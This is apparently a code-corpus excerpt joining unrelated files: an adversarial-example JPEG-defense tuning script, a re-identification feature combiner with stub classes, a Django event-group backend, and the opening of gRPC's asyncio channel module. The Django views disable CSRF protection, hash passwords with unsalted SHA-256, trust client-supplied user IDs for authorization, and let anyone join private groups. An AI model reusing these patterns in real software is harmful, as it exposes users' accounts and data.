pred = outputs.max(1, keepdim=False)[1]
return pred
def common(targets, pred):
common_id = np.where(targets.cpu() == pred.cpu())[0]
return common_id
def attack_success(targets, pred):
attack_id = np.where(targets.cpu() != pred.cpu())[0]
return attack_id
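# Hedged usage sketch (illustrative, not part of the original file):
#     pred = predict(model, images, opt)
#     keep = common(targets, pred)            # indices still classified correctly
#     fooled = attack_success(targets, pred)  # indices where the attack succeeded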
def load_cifar10(opt):
path = os.path.join(opt.dataset_root, 'cifar10/')
transform = transforms.Compose([transforms.ToTensor()])
dataset = datasets.CIFAR10(root=path,
train=False,
transform=transform,download=True)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=opt.bs,
shuffle=True,
num_workers=opt.workers,
pin_memory=True)
return dataloader, len(dataset)
def load_cifar100(opt):
path = os.path.join(opt.dataset_root, 'cifar-100-python/')
transform = transforms.Compose([transforms.ToTensor()])
dataset = datasets.CIFAR100(root=path,
train=False,
transform=transform,download=True)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=opt.bs,
shuffle=True,
num_workers=opt.workers,
pin_memory=True)
return dataloader, len(dataset)
def load_imagenet_val(opt):
path = os.path.join(opt.dataset_root, 'ILSVRC2012/val/')
transform = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor()])
dataset = datasets.ImageFolder(root=path,
transform=transform)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=opt.bs,
shuffle=True,
num_workers=opt.workers,
pin_memory=True
)
return dataloader, len(dataset)
def print_conf(opt):
"""Print and save options
It will print both current options and default values (if different).
It will save options into a text file / [checkpoints_dir] / opt.txt
"""
message = ''
message += '----------------- Options ---------------\n'
for k, v in sorted(vars(opt).items()):
comment = ''
# default = self.parser.get_default(k)
# if v != default:
# comment = '\t[default: %s]' % str(default)
message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
return message
def set_logger(opt):
"""Set the logger to log info in terminal and file `log_path`.
In general, it is useful to have a logger so that every output to the terminal is saved
in a permanent file. Here we save it to `opt.outdir/attack.log`.
Example:
```
logging.info("Starting training...")
```
Args:
opt: options namespace; logs are written to `opt.outdir/attack.log`, and `opt.loglevel` (if set) selects the logging level
"""
if 'loglevel' in opt:
loglevel = getattr(logging, opt.loglevel)
else:
loglevel = logging.INFO
outname = 'attack.log'
outdir = opt.outdir
log_path = os.path.join(outdir,outname)
logger = logging.getLogger()
logger.setLevel(loglevel)
if not logger.handlers:
# Logging to a file
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logger.addHandler(file_handler)
# Logging to console
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(stream_handler)
logging.info(print_conf(opt))
logging.info('writing logs to file {}'.format(log_path))
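# Hedged usage note (not part of the original file): `opt` is expected to
# provide at least `opt.outdir`; an optional `opt.loglevel` such as "DEBUG"
# overrides the default INFO level, e.g.
#     set_logger(opt)
#     logging.info("Starting attack...")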
```
#### File: adaptive-jpeg-compression/remove_code/thresh_hyperopt.py
```python
import gc
from hyperopt import hp, fmin, rand, Trials
# from hyperopt.mongoexp import MongoTrials
# from tqdm import tqdm
from adaptivce_defense import Cal_channel_wise_qtable,Cal_channel_wise_qtable_mp
from art.attacks.evasion import FastGradientMethod
import numpy as np
import torch
from torch.optim import Adam
import os
import sys
import torch.nn as nn
import pickle
# import cv2
from torch.utils.data import DataLoader
from art.estimators.classification import PyTorchClassifier
from adaptivce_defense import adaptive_defender
import matplotlib.pyplot as plt
sys.path.append('../common_code')
import general as g
# import pickle
def get_acc_mp(model,mean,std,images,labels):
images=(images.transpose(0,2,3,1)-mean)/std
images=torch.from_numpy(images.transpose(0,3,1,2)).cuda()
with torch.no_grad():
predictions = model(images)
predictions = np.argmax(predictions.cpu().numpy(),axis=1)
cors = np.sum(predictions==labels)
return cors
def get_acc(fmodel,images,labels):
with torch.no_grad():
predictions = fmodel.predict(images)
predictions = np.argmax(predictions,axis=1)
cors = np.sum(predictions==labels)
return cors
def get_defended_attacked_acc_per_batch(model,mean,std,attack_eps,defenders,defender_names,imgs_in,labels_in):
cors=np.zeros((len(attack_eps)+1,len(defenders)+1))
for i in range(imgs_in.shape[0]):
images_att=imgs_in[i,...].copy()
labels=labels_in
for k in range(len(defenders)+1):
images_def = images_att.copy()
if k>0:
if 'ADAD-flip'==defender_names[k-1]:
images_def,_ = defenders[k-1](images_def.transpose(0,2,3,1).copy(),labels.copy(),None,0)
elif 'ADAD+eps-flip'==defender_names[k-1]:
images_def,_ = defenders[k-1](images_def.transpose(0,2,3,1).copy(),labels.copy(),attack_eps[i]*np.ones(images_def.shape[0]),0)
else:
images_def,_ = defenders[k-1](images_def.transpose(0,2,3,1).copy(),labels.copy())
images_def=images_def.transpose(0,3,1,2)
images_def_cp = images_def.copy()
cors[i,k] += get_acc_mp(model,mean,std,images_def_cp,labels)
del images_def,images_def_cp
cors=cors/imgs_in.shape[1]
return np.expand_dims(cors,axis=0)
def get_defended_attacked_acc_mp(fmodel,attack_eps,defenders,defender_names,imgs_in,labels_in,batch_size):
model=fmodel.model
mean=fmodel.preprocessing.mean
std=fmodel.preprocessing.std
# start pool
ctx = torch.multiprocessing.get_context("spawn")
pool = ctx.Pool(data_setting.device_num*2)
# start_idx=0
# end_idx=batch_size
# get_defended_attacked_acc_per_batch(model,mean,std,attack_eps,defenders,defender_names,imgs_in[:,start_idx:end_idx,...].copy(),labels_in[start_idx:end_idx])
batch_num=int(np.ceil(imgs_in.shape[1]/batch_size))
pool_list=[]
for j in range(batch_num):
start_idx=j*batch_size
end_idx=min((j+1)*batch_size,imgs_in.shape[1])
res=pool.apply_async(get_defended_attacked_acc_per_batch,
args=(model,mean,std,attack_eps,defenders,defender_names,imgs_in[:,start_idx:end_idx,...].copy(),labels_in[start_idx:end_idx]))
pool_list.append(res)
pool.close()
pool.join()
corss=[]
for i in pool_list:
cors = i.get()
corss.append(cors)
cors_np=np.vstack(corss).sum(axis=0)
# cors=cors_np/len(dataloader.dataset)
return cors_np
def get_defended_attacked_acc(fmodel,attack_eps,defenders,defender_names,imgs_in,labels_in,batch_size):
cors=np.zeros((imgs_in.shape[0],len(defenders)))
batch_num=int(np.ceil(imgs_in.shape[1]/batch_size))
for i in range(imgs_in.shape[0]):
for j in range(batch_num):
start_idx=j*batch_size
end_idx=min((j+1)*batch_size,imgs_in.shape[1])
images_att=imgs_in[i,start_idx:end_idx,...].copy()
labels=labels_in[start_idx:end_idx]
for k in range(len(defenders)):
images_def = images_att.copy()
images_def,_ = defenders[k](images_def.transpose(0,2,3,1).copy(),labels.copy(),attack_eps[i]*np.ones(images_def.shape[0]),0)
images_def=images_def.transpose(0,3,1,2)
images_def_cp=images_def.copy()
cors[i,k] += get_acc(fmodel,images_def_cp,labels)
cors=cors/imgs_in.shape[1]
return cors
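# Note (added): get_defended_attacked_acc returns an (n_eps, n_defenders)
# array of accuracies; imgs_in is expected to have shape (n_eps, N, C, H, W)
# and labels_in length N.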
def get_shapleys_batch_adv(attack, dataloader, num_samples):
dataiter = iter(dataloader)
images = []
images_adv = []
labels = []
num_samples_now = 0
for i in range(len(dataloader)):
# t.set_description("Get attacked samples {0:3d}".format(num_samples_now))
data, label = next(dataiter)
save_cln = data.detach().numpy()
save_adv = attack.generate(save_cln)
images.append(save_cln)
images_adv.append(save_adv)
labels.append(label)
num_samples_now=num_samples_now+save_cln.shape[0]
torch.cuda.empty_cache()
if num_samples_now>=num_samples:
break
if num_samples_now<num_samples:
try:
print('\n!!! not enough samples for eps %.1f\n'%attack.eps)
except:
print('\n!!! not enough samples \n')
images_np=None
images_adv_np=None
labels_np=None
if len(images)>0:
images_np=np.vstack(images)
if len(images_adv)>0:
images_adv_np=np.vstack(images_adv)
if len(labels)>0:
labels_np=np.hstack(labels)
return images_np,images_adv_np,labels_np
def cal_table(threshs,saved_dir,cln_imgs_in,adv_imgs_in,attack_eps):
table_dict=dict()
table_dict[0]=np.ones([8,8,3])
for i in range(adv_imgs_in.shape[0]):
clean_imgs_ct=cln_imgs_in.copy()
adv_imgs_ct=adv_imgs_in[i,...].copy()
clean_imgs=np.transpose(clean_imgs_ct,(0,2,3,1))*255
adv_imgs=np.transpose(adv_imgs_ct,(0,2,3,1))*255
clean_imgs_ycc=g.rgb_to_ycbcr(clean_imgs)
adv_imgs_ycc=g.rgb_to_ycbcr(adv_imgs)
np.set_printoptions(suppress=True)
a_qtable,_,_,_=Cal_channel_wise_qtable(clean_imgs_ycc, adv_imgs_ycc,threshs)
a_qtable=np.round(a_qtable)
table_dict[attack_eps[i]]=a_qtable
del clean_imgs,adv_imgs,clean_imgs_ycc,adv_imgs_ycc
gc.collect()
# print(table_dict[0.5])
pickle.dump(table_dict, open(os.path.join(saved_dir,'table_dict_'+str(attack_eps[0])+'.pkl'),'wb'))
# def cal_table_jpeg(threshs,saved_dir,cln_imgs_in,adv_imgs_in,attack_eps):
# table_dict=dict()
# table_dict[0]=np.ones([8,8,3])
# for i in range(adv_imgs_in.shape[0]):
# a_qtable=np.ones([8,8,3])
# a_qtable[:,:,0]=g.scale_table(g.table_y,threshs[i]*100)
# a_qtable[:,:,1]=g.scale_table(g.table_c,threshs[i]*100)
# a_qtable[:,:,2]=g.scale_table(g.table_c,threshs[i]*100)
# table_dict[attack_eps[i+1]]=a_qtable
# pickle.dump(table_dict, open(os.path.join(saved_dir,'table_dict.pkl'),'wb'))
def objective(args):
threshs=np.array((args[0],args[1],args[2]))
saved_dir=args[3]
# fmodel=args[4]
# model=args[5]
cln_imgs_in=args[4]
adv_imgs_in=args[5]
labels=args[6]
batch_size=args[7]
nb_classes=args[8]
input_size=args[9]
pred_batch_size=args[10]
attack_eps=[args[11]]
fmodel=args[12]
# print(threshs)
'''
Compute the quantization table
'''
cal_table(threshs,saved_dir,cln_imgs_in,adv_imgs_in,attack_eps)
table_pkl=os.path.join(saved_dir,'table_dict_'+str(attack_eps[0])+'.pkl')
defender=adaptive_defender(table_pkl,None,nb_classes,input_size,pred_batch_size,None)
'''
Evaluate the defense effectiveness
'''
# labels are those of the original (clean) samples
imgs_in=adv_imgs_in
labels_in=labels
accs=get_defended_attacked_acc(fmodel,attack_eps,[defender.defend],['ADAD+eps-flip'],imgs_in,labels_in,batch_size)
metric=accs.mean(axis=0)[0]
output=-metric
# print(accs)#[:,1])
return output
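# Note (added): hyperopt's fmin minimizes the objective, so `objective`
# returns the negative mean defended accuracy; the best trial therefore
# corresponds to the thresholds that maximize accuracy under the defense.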
def img_and_model_init(model_vanilla_type):
'''
Load the model
'''
dir_model = '../models/cifar_vanilla_'+model_vanilla_type+'.pth.tar'
model,dataset_name=g.select_model(model_vanilla_type, dir_model)
model.eval()
'''
Load the images
'''
data_setting=g.dataset_setting(dataset_name)
dataset=g.load_dataset(dataset_name,data_setting.dataset_dir,'val',data_setting.hyperopt_img_val_num)
dataloader = DataLoader(dataset, batch_size=data_setting.pred_batch_size, drop_last=False, shuffle=False, num_workers=data_setting.workers, pin_memory=True)
optimizer=Adam
optimizer.state_dict
fmodel = PyTorchClassifier(model = model,nb_classes=data_setting.nb_classes,clip_values=(0,1),
input_shape=data_setting.input_shape,loss = nn.CrossEntropyLoss(),
preprocessing=(data_setting.mean, data_setting.std),
optimizer=optimizer)
return data_setting,dataloader,fmodel
def attack_init(fmodel,dataloader,data_setting):
'''
Initialize the attacks
'''
attacks=[]
attack_names=[]
attack_name='FGSM_L2_IDP'
eps=[]#[0.1,0.5,1.0]
eps.append(0.1*data_setting.eps_L2[0])
for i in range(len(data_setting.eps_L2)):
# eps.append(data_setting.eps_L2[i]*0.9)
eps.append(data_setting.eps_L2[i]*1.0)
# eps.append(data_setting.eps_L2[i]*1.1)
# eps=[10.0,1.0,0.5,0.1]
for i in range(len(eps)):
# attacks.append(FastGradientMethod(estimator=fmodel,eps=eps[i],norm=2,eps_step=eps[i],batch_size=data_setting.pred_batch_size))
attack_names.append(attack_name+'_'+str(eps[i]))
attacker,_=g.select_attack(fmodel,attack_name,eps[i])
attacks.append(attacker)
adv_imgs_list=[]
for i in range(len(attacks)):
attacker=attacks[i]
clean_imgs,adv_imgs_tmp,labels=get_shapleys_batch_adv(attacker,dataloader,data_setting.hyperopt_img_num)
adv_imgs_list.append(np.expand_dims(adv_imgs_tmp,axis=0))
adv_imgs=np.vstack(adv_imgs_list)
del adv_imgs_tmp,adv_imgs_list
gc.collect()
return clean_imgs,adv_imgs,labels,eps
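# Note (added): attack_init returns clean_imgs of shape (N, C, H, W),
# adv_imgs of shape (n_eps, N, C, H, W) (one slice per epsilon),
# the labels, and the list of epsilons that were used.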
if __name__=='__main__':
'''
settings
'''
# parse the interpreter / command-line arguments
if len(sys.argv)!=2:
print('Manual Mode !!!')
model_vanilla_type = 'vgg16_imagenet'
else:
print('Terminal Mode !!!')
model_vanilla_type = str(sys.argv[1])
# global fmodel,model#,attacker#,attacker_name,img_num,eps
# attacker_name='FGSM_L2_IDP'
# max_evals=4
# resolution=0.01
g.setup_seed(0)
saved_dir = '../saved_tests/img_attack/'+model_vanilla_type
if not os.path.exists(saved_dir):
os.makedirs(saved_dir)
'''
Initialization
'''
data_setting,dataloader,fmodel=img_and_model_init(model_vanilla_type)
'''
Generate clean and adversarial images
'''
clean_imgs,adv_imgs,labels,eps=attack_init(fmodel, dataloader, data_setting)
'''
Hyperparameter optimization
'''
for idx_eps,eps_now in enumerate(eps):
print('Hyperopt thresh for {}'.format(eps_now))
trials=Trials()
space =[
# hp.choice('t0',[0.066]),hp.choice('t1',[0.003]),hp.choice('t2',[0.165]),
hp.quniform('t0',data_setting.hyperopt_thresh_lower,data_setting.hyperopt_thresh_upper,data_setting.hyperopt_resolution),
hp.quniform('t1',data_setting.hyperopt_thresh_lower,data_setting.hyperopt_thresh_upper,data_setting.hyperopt_resolution),
hp.quniform('t2',data_setting.hyperopt_thresh_lower,data_setting.hyperopt_thresh_upper,data_setting.hyperopt_resolution),#hp.choice('t0',[0.9]),hp.choice('t1',[0.01]),hp.choice('t2',[0.01])
hp.choice('saved_dir',[saved_dir]),
hp.choice('clean_imgs',[clean_imgs]),
hp.choice('adv_imgs_in',[np.expand_dims(adv_imgs[idx_eps,...],axis=0)]),
hp.choice('labels',[labels]),
hp.choice('batch_size',[data_setting.pred_batch_size]),
hp.choice('nb_classes',[data_setting.nb_classes]),
hp.choice('input_size',[data_setting.input_shape[-1]]),
hp.choice('pred_batch_size',[data_setting.pred_batch_size]),
hp.choice('attack_eps',[eps_now]),
hp.choice('fmodel',[fmodel])]
best=fmin(objective,space,algo=rand.suggest,max_evals=data_setting.hyperopt_max_evals,verbose=True, max_queue_len=1,trials=trials)
pickle.dump(trials,open(os.path.join(saved_dir,'hyperopt_trail_'+str(eps_now)+'.pkl'),"wb"))
trials=pickle.load(open(os.path.join(saved_dir,'hyperopt_trail_'+str(eps_now)+'.pkl'),"rb"))
print(best)
'''
Visualization
'''
trials_list=[]
parameters=['t0','t1','t2']
cols = len(parameters)
f, axes = plt.subplots(nrows=1, ncols=cols, figsize=(20, 5))
cmap = plt.cm.jet
for i, val in enumerate(parameters):
xs = np.array([t['misc']['vals'][val] for t in trials.trials]).ravel()
ys = [-t['result']['loss'] for t in trials.trials]
trials_list.append(np.expand_dims(np.vstack((xs,ys)),axis=0))
axes[i].scatter(
xs,
ys,
s=20,
linewidth=0.01,
alpha=1,
c='black')#cmap(float(i) / len(parameters)))
axes[i].set_title(val)
axes[i].set_ylim([np.array(ys).min()-0.1, np.array(ys).max()+0.1])
plt.savefig(os.path.join(saved_dir,'hyperopt_trail_'+str(eps_now)+'.png'), bbox_inches='tight')
trials_np=np.vstack(trials_list)
np.save(os.path.join(saved_dir,'hyperopt_trail_np_'+str(eps_now)+'.npy'),trials_np)
print(trials.best_trial)
'''
Save the best table
'''
cal_table([best['t0'],best['t1'],best['t2']],saved_dir,clean_imgs,np.expand_dims(adv_imgs[idx_eps,...],axis=0),[eps_now])
'''
Merge the final results
'''
table_dict=dict()
table_dict[0]=np.ones([8,8,3])
for idx_eps,eps_now in enumerate(eps):
table_pkl=os.path.join(saved_dir,'table_dict_'+str(eps_now)+'.pkl')
tabel_dict_tmp=pickle.load(open(table_pkl,'rb'))
table_dict.update(tabel_dict_tmp)
pickle.dump(table_dict, open(os.path.join(saved_dir,'table_dict.pkl'),'wb'))
``` |
{
"source": "johnzhang1999/deep-mvb-reid",
"score": 3
} |
#### File: torchreid/utils/multi_image.py
```python
import numpy as np
import torch
from torch import nn
__all__ = ['CombineMultipleImages']
class CombineMultipleImages:
"""
Both returned gf and g_pids are numpy array of float32
"""
def __init__(self, method, embed_dim, input_count, trainloader, encoder):
self.encoder = encoder
self.trainloader = trainloader
if method == "none":
self.fn = Identity()
elif method == "mean":
self.fn = Mean()
elif method == "feed_forward":
self.fn = FeedForward(embed_dim, input_count)
elif method == "self_attention":
self.fn = SelfAttention(embed_dim, input_count)
def train(self):
self.fn.train(self.encoder, self.trainloader)
def __call__(self, gf, g_pids, g_camids):
return self.fn(gf, g_pids, g_camids)
class CombineFunction:
def train(self, encoder, dataloader):
pass
def __call__(self, gf, g_pids, g_camids):
raise NotImplementedError
class Identity(CombineFunction):
def __call__(self, gf, g_pids, g_camids):
return gf, g_pids
class Mean(CombineFunction):
def __call__(self, gf, g_pids, g_camids):
gf = gf.numpy()
unique_ids = set(g_pids)
new_g_pids = []
gf_by_id = np.empty((len(unique_ids), gf.shape[-1]))
for i, gid in enumerate(unique_ids):
gf_by_id[i] = np.mean(gf[np.asarray(g_pids) == gid], axis=0)
new_g_pids.append(gid)
gf = np.array(gf_by_id)
g_pids = np.array(new_g_pids)
return gf, g_pids
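# Hedged usage sketch (illustrative, not part of the original file):
#     combiner = Mean()
#     gf, pids = combiner(torch.randn(6, 4), [1, 1, 2, 2, 3, 3], None)
#     # gf has shape (3, 4): one mean-pooled gallery feature per unique pid.
# Note that iterating over set(g_pids) means the order of the returned ids is
# not guaranteed to match the input order.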
class FeedForward(CombineFunction): # TODO:
def __init__(self, embed_dim, input_count):
super().__init__()
self.model = FeedForwardNN(embed_dim, input_count)
def train(self, encoder, dataloader):
for data in dataloader:
imgs = data[0]
pids = data[1]
cam_ids = data[2]
# print(len(data))
# exit()
def __call__(self, gf, g_pids, g_camids):
result = self.model(gf, g_pids, g_camids)
# Some modification on result
return result
class SelfAttention(CombineFunction):
def __init__(self, embed_dim, input_count):
self.model = SelfAttentionNN(embed_dim, input_count)
def train(self, encoder, dataloader):
pass
def __call__(self, gf, g_pids, g_camids):
result = self.model(gf, g_pids, g_camids)
# Some modification on result
return result
class FeedForwardNN(nn.Module):
def __init__(self, embed_dim, input_count):
super().__init__()
self.fc1 = nn.Linear(embed_dim * input_count, embed_dim * input_count)
self.fc2 = nn.Linear(embed_dim * input_count, embed_dim)
def forward(self, x):
pass
class SelfAttentionNN(nn.Module):
def __init__(self, embed_dim, input_count):
super().__init__()
def forward(self, x):
pass
``` |
{
"source": "johnzhang1999/Pop",
"score": 2
} |
#### File: Pop/backend/models.py
```python
from django.db import models
import datetime
# Create your models here.
class User(models.Model):
name = models.CharField(max_length=32)
uid = models.CharField(max_length=36, primary_key=True)
pwdHash = models.BinaryField(max_length=32)
expoPushToken = models.CharField(max_length=64)
def __str__(self):
return self.name
class Event(models.Model):
name = models.CharField(max_length=32)
desc = models.CharField(max_length=256)
loc = models.CharField(max_length=64)
eid = models.CharField(max_length=36, primary_key=True)
confirmed = models.IntegerField(default=0)
confirmedMembers = models.ManyToManyField(User, related_name='group_confirmed_members')
initTime = models.DateTimeField(default=datetime.datetime.now)
owner = models.ForeignKey(User, related_name='event_owner', on_delete=models.CASCADE)
def __str__(self):
return self.name
class Group(models.Model):
name = models.CharField(max_length=64)
gid = models.CharField(max_length=36, primary_key=True)
members = models.ManyToManyField(User, related_name='group_members')#, through='Membership', through_fields=('group', 'user'))
owner = models.ForeignKey(User, related_name='group_owner', on_delete=models.CASCADE)
GROUP_TYPE_CHOICES = (
('private', 'Private Group'),
('public', 'Public Group')
)
groupType = models.CharField(max_length=7, choices=GROUP_TYPE_CHOICES)
events = models.ManyToManyField(Event, related_name='group_events')
def __str__(self):
return self.name
'''
class Membership(models.Model):
group = models.ForeignKey(Group, related_name='group_membership', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='user_membership', on_delete=models.CASCADE)
notify = models.BooleanField()
'''
```
#### File: Pop/backend/views.py
```python
from django.http import JsonResponse, Http404
from django.views.decorators.csrf import csrf_exempt
from exponent_server_sdk import PushClient, PushMessage, DeviceNotRegisteredError
from .models import Group, User, Event
import hashlib, uuid
def getParams(request, tags):
print(request.POST)
return [request.POST[i] for i in tags]
def getHash(name, pwd):
return hashlib.sha256((name+pwd).encode()).digest()
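# Note (added): register() and login() both derive the stored credential via
# getHash(name, pwd), e.g.
#     getHash('alice', 'secret') == hashlib.sha256(b'alicesecret').digest()
# so a password check is a plain equality test against User.pwdHash.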
# Create your views here.
@csrf_exempt
def getUid(request):#done, tested
[name] = getParams(request, ['name'])
q = User.objects.filter(pk=name)
if len(q) > 0:
return JsonResponse({'uid': q[0].uid})
else:
raise Http404("you done fked up")
@csrf_exempt
def joinOpenGroup(request):#done, tested
[uid, gid] = getParams(request, ['uid', 'gid'])
g = Group.objects.get(pk=gid)
u = User.objects.get(pk=uid)
if g.groupType == 'public' or g.groupType == 'private':
g.members.add(u)
g.save()
return JsonResponse({'success': 'true'})
else:
raise Http404("Invalid group or invalid user!")
@csrf_exempt
def addEvent(request):#done, tested
[uid, gid, name, desc, loc] = getParams(request, ['uid', 'gid', 'name', 'desc', 'loc'])
newEvent = Event(name=name, eid=str(uuid.uuid4()), desc=desc, loc=loc, owner=User.objects.get(pk=uid))
newEvent.save()
q = Group.objects.get(pk=gid)
q.events.add(newEvent)
q.save()
if q.groupType == 'private' or q.groupType == 'public':
responses = PushClient().publish_multiple([PushMessage(to=u.expoPushToken,
title='{} happening at {}!'.format(name, loc),
body=newEvent.desc,
ttl=3,
priority='high',
sound='default') for u in q.members.all()])
for i in range(len(responses)):
try:
responses[i].validate_response()
except DeviceNotRegisteredError:
u = q.members.all()[i]
u.expoPushToken = ''
u.save()
return JsonResponse({'eid': newEvent.eid})
@csrf_exempt
def deleteEvent(request):#done, BUGGY
[uid, eid] = getParams(request, ['uid', 'eid'])
q = Event.objects.get(pk=eid)
g = q.group_events.all()[0]
if uid == q.owner.uid or uid == g.owner.uid:
g.events.remove(q)
q.delete()
return JsonResponse({'success': 'true'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def getGroupList(request):#done, tested
[uid] = getParams(request, ['uid'])
gList = User.objects.get(pk=uid).group_members.all()
return JsonResponse({'groupList': [g.gid for g in gList]})
@csrf_exempt
def getGroupInfo(request):#done, tested
[gid] = getParams(request, ['gid'])
g = Group.objects.get(pk=gid)
return JsonResponse({'gid': gid,'name': g.name, 'type': g.groupType,
'memberList': [u.uid for u in g.members.all()],
'owner': g.owner.uid, 'unconfirmed': 0})
@csrf_exempt
def getEventList(request):#done, should be ok
[gid] = getParams(request, ['gid'])
eList = Group.objects.get(gid=gid).events.all()
return JsonResponse({'eventList': [e.eid for e in eList]})
@csrf_exempt
def getEventInfo(request):#done, tested
[eid, uid] = getParams(request, ['eid', 'uid'])
q = Event.objects.get(pk=eid)
return JsonResponse({'eid': eid, 'name': q.name,'desc': q.desc, 'loc': q.loc,
'status': q.confirmed, 'initTime': q.initTime.strftime('%b-%d %I:%M %p'),
'owner': q.owner.uid, 'isOwner': uid == q.owner.uid or uid == q.group_events.all()[0].owner.uid})
@csrf_exempt
def register(request):#done, tested
[name, pwd] = getParams(request, ['name', 'pwd'])
if len(User.objects.filter(name=name)) > 0:
raise Http404("Try another name!")
newUser = User(name=name, uid=str(uuid.uuid4()), pwdHash=getHash(name, pwd))
newUser.save()
return JsonResponse({'uid': newUser.uid})
@csrf_exempt
def login(request):#done, tested
[name, pwd] = getParams(request, ['name', 'pwd'])
u = User.objects.get(name=name)
if u.pwdHash == getHash(name, pwd):
for otheruser in User.objects.exclude(uid=u.uid):
if otheruser.expoPushToken == u.expoPushToken:
otheruser.expoPushToken = ''
otheruser.save()
return JsonResponse({'uid': u.uid})
else:
raise Http404("Restricted access!")
@csrf_exempt
def createGroup(request):#done, tested
[uid, name, gtype] = getParams(request, ['uid', 'name', 'type'])
newGroup = Group(name=name, gid=str(uuid.uuid4()), owner=User.objects.get(uid=uid), groupType=gtype)
newGroup.save()
newGroup.members.add(User.objects.get(uid=uid))
newGroup.save()
return JsonResponse({'gid': newGroup.gid})
@csrf_exempt
def removeMember(request):#done, tested
[m_uid, uid, gid] = getParams(request, ['m_uid', 'uid', 'gid'])
if m_uid == Group.objects.get(pk=gid).owner.uid or m_uid == uid:
q = Group.objects.get(pk=gid)
q.members.remove(User.objects.get(pk=uid))
q.save()
return JsonResponse({'status': 'success'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def addMember(request):#done, tested
[m_uid, uid, gid] = getParams(request, ['m_uid', 'uid', 'gid'])
if m_uid == Group.objects.get(pk=gid).owner.uid:
q = Group.objects.get(pk=gid)
q.members.add(User.objects.get(pk=uid))
q.save()
return JsonResponse({'status': 'success'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def deleteGroup(request):#done, BUGGY
[gid, uid] = getParams(request, ['gid', 'uid'])
q = Group.objects.get(pk=gid)
if uid == q.owner.uid:
q.delete()
return JsonResponse({'status': 'success'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def getUserInfo(request):#done, tested
[uid] = getParams(request, ['uid'])
name = User.objects.get(pk=uid).name
return JsonResponse({'name': name})
@csrf_exempt
def confirmEvent(request):#done, tested
[uid, eid] = getParams(request, ['uid', 'eid'])
e = Event.objects.get(pk=eid)
if len(e.confirmedMembers.filter(pk=uid)) == 0:
e.confirmed += 1
e.confirmedMembers.add(User.objects.get(pk=uid))
e.save()
if e.confirmed == 1:
g = e.group_events.all()[0]
if g.groupType == 'public':
responses = PushClient().publish_multiple([PushMessage(to=u.expoPushToken,
title="You'll never believe what you're missing out on!",
body="This is a test notification",
ttl=30,
priority='high',
sound='default') for u in g.members.all()])
for i in range(len(responses)):
try:
responses[i].validate_response()
except DeviceNotRegisteredError:
u = g.members.all()[i]
u.expoPushToken = ''
u.save()
return JsonResponse({'status': 'success'})
else:
raise Http404("Multiple confirmation")
@csrf_exempt
def search(request):#done, tested
[query] = getParams(request, ['q'])
return JsonResponse({'list': [g.gid for g in Group.objects.all()
if query in g.name and g.groupType == 'public']})
@csrf_exempt
def updateToken(request):
[token, uid] = getParams(request, ['token', 'uid'])
u = User.objects.get(uid=uid)
print("before: "+u.expoPushToken)
u.expoPushToken = token
u.save()
print("after: "+u.expoPushToken)
return JsonResponse({'status': 'success'})
``` |
{
"source": "JohnZhaoXiaoHu/grpc",
"score": 2
} |
#### File: experimental/aio/_channel.py
```python
import asyncio
from typing import Any, AsyncIterable, Optional, Sequence, AbstractSet, Text
from weakref import WeakSet
import logging
import grpc
from grpc import _common
from grpc._cython import cygrpc
from . import _base_call
from ._call import (StreamStreamCall, StreamUnaryCall, UnaryStreamCall,
UnaryUnaryCall)
from ._interceptor import (InterceptedUnaryUnaryCall,
UnaryUnaryClientInterceptor)
from ._typing import (ChannelArgumentType, DeserializingFunction, MetadataType,
SerializingFunction)
from ._utils import _timeout_to_deadline
_IMMUTABLE_EMPTY_TUPLE = tuple()
_LOGGER = logging.getLogger(__name__)
class _OngoingCalls:
"""Internal class used for have visibility of the ongoing calls."""
_calls: AbstractSet[_base_call.RpcContext]
def __init__(self):
self._calls = WeakSet()
def _remove_call(self, call: _base_call.RpcContext):
try:
self._calls.remove(call)
except KeyError:
pass
@property
def calls(self) -> AbstractSet[_base_call.RpcContext]:
"""Returns the set of ongoing calls."""
return self._calls
def size(self) -> int:
"""Returns the number of ongoing calls."""
return len(self._calls)
def trace_call(self, call: _base_call.RpcContext):
"""Adds and manages a new ongoing call."""
self._calls.add(call)
call.add_done_callback(self._remove_call)
class _BaseMultiCallable:
"""Base class of all multi callable objects.
Handles the initialization logic and stores common attributes.
"""
_loop: asyncio.AbstractEventLoop
_channel: cygrpc.AioChannel
_ongoing_calls: _OngoingCalls
_method: bytes
_request_serializer: SerializingFunction
_response_deserializer: DeserializingFunction
_interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]]
# pylint: disable=too-many-arguments
def __init__(
self,
channel: cygrpc.AioChannel,
ongoing_calls: _OngoingCalls,
method: bytes,
request_serializer: SerializingFunction,
response_deserializer: DeserializingFunction,
interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]],
loop: asyncio.AbstractEventLoop,
) -> None:
self._loop = loop
self._channel = channel
self._ongoing_calls = ongoing_calls
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._interceptors = interceptors
class UnaryUnaryMultiCallable(_BaseMultiCallable):
"""Factory an asynchronous unary-unary RPC stub call from client-side."""
def __call__(self,
request: Any,
*,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.UnaryUnaryCall:
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
